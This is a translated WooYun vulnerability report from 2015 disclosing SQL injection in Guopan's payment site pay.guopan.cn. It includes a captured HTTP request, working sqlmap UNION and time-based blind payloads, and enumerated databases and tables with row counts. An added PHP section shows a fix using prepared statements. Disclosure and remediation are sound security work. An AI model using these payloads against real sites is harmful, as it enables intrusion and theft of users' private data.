Vulnerability summary

Defect ID: wooyun-2015-0114150

Title: SQL injection on an important Guopan Games site

Vendor: 果盘 (Guopan)

Author: 路人甲

Submitted: 2015-05-15 09:55

Fix deadline: 2015-06-29 09:56

Disclosed: 2015-06-29 09:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-05-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-06-29: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

233

Detailed description:

There are quite a few injection points.
1.
POST /pay.php HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: pay.guopan.cn
Cookie: *****打码区*****
Hm_lvt_1b78342dd1d7ec636f3e4a9f2e35bacd=1431597451; Hm_lpvt_1b78342dd1d7ec636f3e4a9f2e35bacd=1431597451
Host: pay.guopan.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
game=1&get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0&platform=1
Parameters: all of the game-related ones!!!
2.
pay.guopan.cn/game_list.php?find=&more=hot&platform=1
Parameters: find, more, platform
3.
pay.guopan.cn/game_list.php?platform=1&word=
Parameters: platform, word
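The following is an added illustration, not code from the report or from Guopan: the two entry points named above (POST /pay.php with get_server_list=1, and GET /game_list.php with find / more / platform / word) rewritten over PDO prepared statements, next to the concatenation pattern that sqlmap's UNION and time-based payloads rely on. The table names game_server_list and android_gp_game_list are taken from the report's database listing; the column names, the DSN and credentials, and the sort-order whitelist are assumptions. It is written for PHP 7 or later (the report shows PHP 5.4.23, where the same PDO calls exist but the short null-coalescing syntax does not).

```php
<?php
// Added illustration, not code from the report or from Guopan. The table
// names game_server_list and android_gp_game_list appear in the report's
// database listing; column names, DSN and credentials are assumptions.
declare(strict_types=1);

function db(): PDO {
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=Guopan;charset=utf8mb4', 'app_user', 'placeholder');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Use server-side prepares; with emulation PDO interpolates values client-side.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// The shape that produces the report's findings: request values spliced into
// the SQL text, so a quote in the game parameter ends the literal and the rest
// of the value is executed as SQL.
function getServerListUnsafe(PDO $pdo, array $post): array {
    $sql = "SELECT id, name FROM game_server_list"
         . " WHERE game_id = '" . $post['game'] . "'"
         . " AND operator_platform = '" . $post['operator_platform'] . "'"
         . " AND platform = '" . $post['platform'] . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened handler for POST /pay.php with get_server_list=1.
function getServerList(PDO $pdo, array $post): array {
    // game and platform are numeric ids: anything that is not an integer is rejected.
    $game     = filter_var($post['game'] ?? '', FILTER_VALIDATE_INT);
    $platform = filter_var($post['platform'] ?? '', FILTER_VALIDATE_INT);
    if ($game === false || $platform === false) {
        throw new InvalidArgumentException('game and platform must be integers');
    }
    // operator_platform is free text ("iOS官方平台" in the report): bound, never concatenated.
    $operator = (string) ($post['operator_platform'] ?? '');

    $stmt = $pdo->prepare(
        'SELECT id, name FROM game_server_list
          WHERE game_id = :game AND operator_platform = :op AND platform = :platform'
    );
    $stmt->bindValue(':game', $game, PDO::PARAM_INT);
    $stmt->bindValue(':op', $operator, PDO::PARAM_STR);
    $stmt->bindValue(':platform', $platform, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened handler for GET /game_list.php (find / more / platform / word).
function gameList(PDO $pdo, array $get): array {
    $platform = filter_var($get['platform'] ?? '', FILTER_VALIDATE_INT);
    if ($platform === false) {
        throw new InvalidArgumentException('platform must be an integer');
    }
    // `more` picks a sort order. ORDER BY targets cannot be bound as parameters,
    // so the value is mapped through a fixed whitelist (assumed columns) instead of echoed.
    $orderBy = ['hot' => 'download_count DESC', 'new' => 'created_at DESC'];
    $more = $get['more'] ?? 'hot';
    if (!isset($orderBy[$more])) {
        throw new InvalidArgumentException('unknown value for more');
    }
    // find / word are search terms. Escape LIKE wildcards (MySQL's default
    // escape character is the backslash) so input cannot widen the match, then bind.
    $term = (string) ($get['word'] ?? $get['find'] ?? '');
    $like = '%' . addcslashes($term, '%_\\') . '%';

    $stmt = $pdo->prepare(
        "SELECT id, name FROM android_gp_game_list
          WHERE platform = :platform AND name LIKE :term
          ORDER BY {$orderBy[$more]}"
    );
    $stmt->bindValue(':platform', $platform, PDO::PARAM_INT);
    $stmt->bindValue(':term', $like, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Dispatch on the two entry points the report names.
$pdo  = db();
$script = basename($_SERVER['SCRIPT_NAME'] ?? '');
if ($script === 'pay.php' && ($_POST['get_server_list'] ?? '') === '1') {
    $rows = getServerList($pdo, $_POST);
} else {
    $rows = gameList($pdo, $_GET);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($rows, JSON_UNESCAPED_UNICODE);
```

Two details are easy to get wrong when retrofitting a handler like this. Disabling PDO::ATTR_EMULATE_PREPARES matters because, with emulation on, PDO builds the final SQL string itself and the server never sees a parameterised statement; and the ORDER BY column cannot be bound at all, so a parameter such as more has to be mapped through a whitelist rather than interpolated.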

Proof of vulnerability:

---
Parameter: operator_platform (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: game=1&get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0') UNION ALL SELECT CONCAT(0x716a786b71,0x70525a6b746d77746166,0x71766a7871)-- &platform=1
Parameter: game (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: game=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Tjmn) AND 'WlEy'='WlEy&get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0&platform=1
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: game=1' UNION ALL SELECT CONCAT(0x716a786b71,0x4c766d5a4878534d6b4c,0x71766a7871)-- &get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0&platform=1
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0.12
available databases [7]:
[*] GPBbs
[*] GPMessageLog
[*] GPZixunVistLog
[*] Guopan
[*] information_schema
[*] testGPBbs
[*] testGuopan
Database: Guopan
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| guopan_online_log | 4719597 |
| guopan_count_danmu_hour | 1983942 |
| guopan_zixun_visit | 495907 |
| guopan_count_tab | 179721 |
| guopan_fankui | 150779 |
| android_xx_user_feedback | 50051 |
| coc_chongzhi_ask | 48635 |
| coc_chongzhi_qudao_count | 37826 |
| zixun_collect | 31609 |
| coc_chongzhi_ask_msg | 24856 |
| android_gp_packagedata_list | 19772 |
| ios_xx_user_feedback | 17052 |
| guild_msg_hour | 14522 |
| guopan_count_danmu_all | 9434 |
| information | 9064 |
| guopan_user_black_list | 7915 |
| reg_summary_date | 7652 |
| coc_chongzhi_vip | 6692 |
| coc_chongzhi_user_info | 6520 |
| game_server_list | 5266 |
| ios_gp_packagedata_list | 4799 |
| guopan_sms_day | 2473 |
| guopan_danmu_eventkey_day | 2143 |
| xx_pay_game_detail | 930 |
| coc_chongzhi_date_count | 886 |
| gp_kw_black_list | 357 |
| web_xx_user_feedback | 278 |
| gp_nickname_kw_black_list | 234 |
| xx_pay_game_list | 83 |
| android_gp_picture_file_list | 37 |
| android_gp_app_file_list | 34 |
| ios_gp_picture_file_list | 26 |
| ios_gp_game_list | 25 |
| guopan_fid_game_map | 22 |
| ios_gp_app_file_list | 22 |
| android_gp_game_list | 21 |
| chat_channel_base | 12 |
| t_edituser | 12 |
| chat_server | 8 |
| chat_channel_ex | 6 |
| android_xx_update_table | 4 |
| ios_xx_activity_list | 2 |
| android_xx_activity_list | 1 |
+------------------------------+---------+
Database: GPBbs
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| sixin_msg_1504 | 861114 |
| sixin_msg_1503 | 631812 |
| sixin_msg_1501 | 560236 |
| guild_heat_log | 479469 |
| dm_login_time_ac | 476196 |
| sixin_sess_ab | 453103 |
| sixin_msg_1502 | 396984 |
| sixin_msg_1412 | 369560 |
| sixin_msg_1505 | 356982 |
| sixin_sess_ac | 311708 |
| comment_ab | 180375 |
| guild_apply_log | 154117 |
| dm_login_time_ab | 141822 |
| f_uin_ab | 111524 |
| dm_login_time_ad | 86624 |
| u_c_ab | 80520 |
| sixin_msg_1411 | 65090 |
| u_c_ac | 63816 |
| dm_badreport | 60617 |
| t_dianzan_uin_ab | 58615 |
| sixin_sess_aa | 54928 |
| fb_ab | 50759 |
| u_c_t_ab | 47999 |
| dm_login_time_aa | 47506 |
| sixin_u_del_sys_msg_ac | 44537 |
| tinfo_ab | 38031 |
| u_c_aa | 36797 |
| u_c_t_ac | 36310 |
| guild_member | 27382 |
| sixin_sess_ad | 26994 |
| f_uin_aa | 25344 |
| u_t_ac | 25037 |
| sixin_u_del_sys_msg_ab | 22879 |
| u_c_t_aa | 21276 |
| xfc_fankui | 20667 |
| upload_video_log | 17350 |
| gp_bbs_forum_day | 17166 |
| uex_bbs_statistic_ac | 17079 |
| u_t_ab | 16945 |
| fb_aa | 16247 |
| tinfo_aa | 13033 |
| uex_bbs_statistic_ab | 9024 |
| guild_info | 9015 |
| u_deviceToken_ac | 8055 |
| guild_type | 7954 |
| admin_log | 7446 |
| quit_guild_log | 7407 |
| u_t_aa | 7401 |
| sixin_u_del_sys_msg_aa | 7308 |
| sixin_msg_1409 | 6792 |
| dm_badreport_private | 5678 |
| guild_active_log | 5432 |
| vote_info | 4474 |
| u_deviceToken_ab | 3500 |
| t_badreport_log | 3347 |
| sixin_u_del_sys_msg_ad | 3206 |
| t_manager_del_log | 3079 |
| at_dianzan_uin_aa | 3026 |
| uex_bbs_statistic_aa | 2859 |
| at_comment_aa | 2783 |
| comment_aa | 2755 |
| a_uin | 2302 |
| tinfo_log | 2056 |
| u_c_ad | 1955 |
| u_deviceToken_aa | 1856 |
| u_t_ad | 1724 |
| uex_bbs_statistic_ad | 1692 |
| u_c_t_ad | 1270 |
| user_upload | 1264 |
| atinfo | 899 |
| vote_statistics | 854 |
| sixin_msg_1408 | 822 |
| t_dianzan_uin_aa | 779 |
| sixin_msg_1410 | 650 |
| gp_bbs_activity_day | 576 |
| u_deviceToken_ad | 377 |
| xfc_game_info | 211 |
| t_recomend_list | 195 |
| kw_block_list | 175 |
| user_block_list | 173 |
| gp_bbs_basic_day | 155 |
| guild_base_day | 142 |
| t_recomend_video_list | 122 |
| t_copy_to_f_log | 117 |
| finfo | 69 |
| ainfo | 39 |
| sixin_block_list | 36 |
| at_badreport_log | 32 |
| f_game_list | 30 |
| f_gpapp | 27 |
| radio_history | 16 |
| f_recommend_list | 12 |
| sixin_msg_sys | 12 |
| a_recommend_list | 8 |
| f_banner_list | 8 |
| f_interest_list | 5 |
| t_web_recomend_list | 3 |
| ftype_info | 2 |
+------------------------+---------+

Fix recommendation:

~~

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined the report